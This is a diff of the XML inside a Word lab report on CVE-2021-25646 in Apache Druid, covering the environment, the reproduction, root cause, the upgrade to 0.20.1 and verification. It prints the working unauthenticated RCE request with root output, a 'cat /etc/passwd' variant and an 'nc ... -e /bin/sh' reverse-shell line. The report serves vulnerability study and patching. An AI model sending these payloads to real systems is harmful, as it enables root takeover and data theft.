-        <w:t xml:space="preserve">    }}}},</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  "samplerConfig": {"numRows": 10} }'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Result - the command executes as root inside the container, without any authentication:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>{"numRowsRead":10,"numRowsIndexed":10,"data":[</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  {"input":{"timestamp":123123,</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    "test":"uid=0(root) gid=0(root) groups=0(root)\n"},</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">   "parsed":{"__time":123123,</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    "test":"uid=0(root) gid=0(root) groups=0(root)\n"}}]}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The empty key is not cosmetic. Without the "": {"enabled": "true"} object the sampler rejects the JavaScript format and the request is harmless - which is exactly the behaviour of the patched version. A single unvalidated key converts a disabled feature into running code, and this observation is itself part of the root-cause explanation: the guard was a value in a deserialised map, not a decision of the server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The same primitive runs any command. Replacing id with cat /etc/passwd returns the file contents inside the sampler response, and a reverse shell works identically - embedded-script execution is full compromise, not a reading primitive:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  "function": "...exec([\"sh\",\"-c\",\"cat /etc/passwd\"])..."   # file contents returned</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  "function": "...exec([\"sh\",\"-c\",\"nc host port -e /bin/sh\"])..."  # reverse shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The measured output confirms the scale: id returns uid=0(root) - the Druid container runs as root - and cat /etc/passwd returns the complete file with every account. Arbitrary command execution with root privileges is total compromise of the container and of any data it can reach.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="3259304"/>
-            <wp:docPr id="6" name="Picture 6"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic>
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="05-druid-rce.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="3259304"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect"/>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure. The sampler executes id and cat /etc/passwd through the Rhino engine; the output comes back inside the JSON response</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>9. Root cause analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The vulnerability is not a single mistyped line. It is the combination of a dangerous feature, a broken configuration guard and an unauthenticated endpoint. Five points explain the defect completely.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>First, the guard is a value, not a decision. JavaScript parsing in Druid is disabled unless the operator opts in; the design intent is that untrusted clients can never reach the engine. But the guard exists only as an enabled flag inside a configuration map that the request itself contributes to - the server never treats it as an invariant.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Second, the deserializer accepts an empty key. The parseSpec object is built by Jackson from the request JSON. A JSON object with the empty string "" as a key was accepted and merged into that map, overwriting the enabled flag with true. One unvalidated map key downgraded a hard configuration guarantee into a client-controlled suggestion (CWE-732).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Third, the engine has no sandbox. Once the feature is on, the function field is handed to the Rhino JavaScript engine running inside the JVM, which exposes java.lang.Runtime. JavaScript can therefore start native processes with the full privileges of the server; nothing about the feature was designed for hostile input, because it was never supposed to be reachable.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Fourth, the endpoint is unauthenticated. The Druid console ships without authentication by default, so the sampler request needs no account. Even where authentication is configured, the override would still let any low-privileged user execute commands - the guard that failed was the configuration flag, so authentication alone would not have contained it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Fifth, the impact is total compromise. The measured output shows uid=0(root): the Druid container runs as root, so every command executes with root privileges. A reverse shell works identically, and in a cloud deployment the same primitive could reach the instance metadata service and obtain temporary credentials - which is why embedded-script execution is rated high for confidentiality, integrity and availability.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The patch confirms the analysis: version 0.20.1 rejects the empty-key override, so the JavaScript feature can no longer be forced on by a request, and the function field is never evaluated when the feature is disabled. The fix removes the root cause - the accepted override - rather than filtering payloads.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>10. Applied protection measures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Because the defect is in a third-party component, the correct remediation is to run a version that contains the patch. The vulnerable image in the Compose file is replaced by a 0.20.1 build:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>services:</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  druid:</w:t>
-        <w:br/>
-        <w:t>-    image: vulhub/apache-druid:0.20.0</w:t>
-        <w:br/>
-        <w:t>+    build:</w:t>
-        <w:br/>
-        <w:t>+      context: .</w:t>
-        <w:br/>
-        <w:t>+      dockerfile: Dockerfile     # builds a Druid 0.20.1 image</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The official apache/druid:0.20.1 image is built on a distroless base that cannot run the start-nano-quickstart launcher: it ships neither bash nor perl, which the launcher scripts require. To keep both environments comparable - same launcher, same embedded ZooKeeper, same port - fixes/Dockerfile keeps the vulhub base (which provides those tools) and replaces only the vulnerable 0.20.0 jars with the fixed 0.20.1 jars copied from the official image. The change is applied and the environment is rebuilt:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>docker compose -f cve/CVE-2021-25646/docker-compose.yml down</w:t>
-        <w:br/>
-        <w:t>docker compose -f fixes/docker-compose.yml up -d --build</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Why this is effective: the vulnerable behaviour was the accepted empty-key override. In 0.20.1 the override is rejected, so the function field of a sampler request is never passed to the Rhino engine and java.lang.Runtime can no longer be reached. The primitive itself disappears rather than being filtered.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Two secondary measures would be appropriate if upgrading were impossible, and are worth mentioning because they illustrate defence in depth: restrict network access to the Druid console to trusted hosts, or reject any sampler request whose parseSpec format is javascript at a reverse proxy. Neither is as complete as the patch, because on a vulnerable version the override would still bypass a purely configuration-based guard.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11. Verification of the fix</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The verification repeats exactly the same request that executed id as root before, and then checks that the service still works. The second half is not optional: a fix that breaks the product is not a fix.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>$ ./verify_fix.sh http://127.0.0.1:8888</w:t>
-        <w:br/>
-        <w:t>== 1. Replay the exploit (must NOT execute the command)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">   body: {"error":"Failed to sample data: JavaScript is disabled"}</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">   [PASS] no command output - the JavaScript feature is disabled</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>On the vulnerable version the same request returned uid=0(root); on the patched version the sampler refuses the request and no code runs. Regression checks confirm that the patched server itself is healthy:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>$ curl -s http://127.0.0.1:8888/status</w:t>
-        <w:br/>
-        <w:t>{"version":"0.20.1","modules":[...]}      # exact running version</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t>$ curl -s -o /dev/null -w '%{http_code}' http://127.0.0.1:8888/</w:t>
-        <w:br/>
-        <w:t>302                                        # console renders</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="2183970"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="932969"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="7" name="Picture 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -4283,11 +4263,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic>
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="06-druid-fixed.png"/>
+                    <pic:cNvPr id="7" name="image7.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId107"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4295,9 +4275,11 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="2183970"/>
+                      <a:ext cx="5700000" cy="932969"/>
                     </a:xfrm>
-                    <a:prstGeom prst="rect"/>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -4308,26 +4290,112 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure. The same request on 0.20.1 returns JavaScript is disabled - no command output</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pytest: 12 tests, no failures (screenshot 10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">7. Vulnerable environment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">CVE-2021-25646 was selected. It affects Apache Druid up to and including 0.20.0 and is fixed in 0.20.1. The CVSS 3.1 score is 8.8 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - and the weakness class is CWE-732, incorrect permission assignment for a critical resource. No credentials are required, because the Druid console has no authentication by default.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The environment comes from Vulhub, which packages the exact vulnerable version as a Docker Compose project. The copy used here is checked into the repository, so the experiment can be repeated without cloning anything:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cd secure-api/cve/CVE-2021-25646</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">docker compose up -d</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">docker compose ps          # wait for 'running', about 30 s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The container runs vulhub/apache-druid:0.20.0, publishes port 8888 and starts the single-server quickstart with an embedded ZooKeeper, so the indexing endpoints are reachable as soon as the process is up. Nothing has to be configured to make it exploitable - the vulnerable feature is off, and the attack is the request that switches it back on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="2713052"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="874537"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="8" name="Picture 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -4336,11 +4404,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic>
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="07-druid-regression.png"/>
+                    <pic:cNvPr id="8" name="image8.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId108"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4348,9 +4416,11 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="2713052"/>
+                      <a:ext cx="5700000" cy="874537"/>
                     </a:xfrm>
-                    <a:prstGeom prst="rect"/>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -4361,23 +4431,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure. Regression: /status reports version 0.20.1 and the console still responds</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The result is summarised by the verification script shipped in the repository: RESULT: fix verified, service healthy.</w:t>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">docker compose ps: vulnerable Druid 0.20.0 container running (screenshot 04)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4388,6 +4452,1033 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+        <w:t xml:space="preserve">8. Reproducing the attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Apache Druid can parse incoming data with a JavaScript function evaluated by the embedded Rhino engine. The feature is intended for high-trust environments and is disabled by default, so a request that merely asks for it is rejected. The crafted body asks anyway, and adds one field that the deserialiser should never have accepted: an object whose key is the empty string.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">POST /druid/indexer/v1/sampler        Content-Type: application/json</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "type": "index",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "spec": {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "ioConfig": { "type": "index",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      "firehose": { "type": "local", "baseDir": "/etc", "filter": "passwd" } },</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "dataSchema": { "dataSource": "test",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      "parser": { "parseSpec": {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        "format": "javascript",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        "timestampSpec": {}, "dimensionsSpec": {},</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        "function": "function(){ var out = java.lang.Runtime.getRuntime()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            .exec(['sh','-c','id']).getInputStream(); ... return {test: a} }",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        "": { "enabled": "true" }        &lt;-- the whole vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      } } } },</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
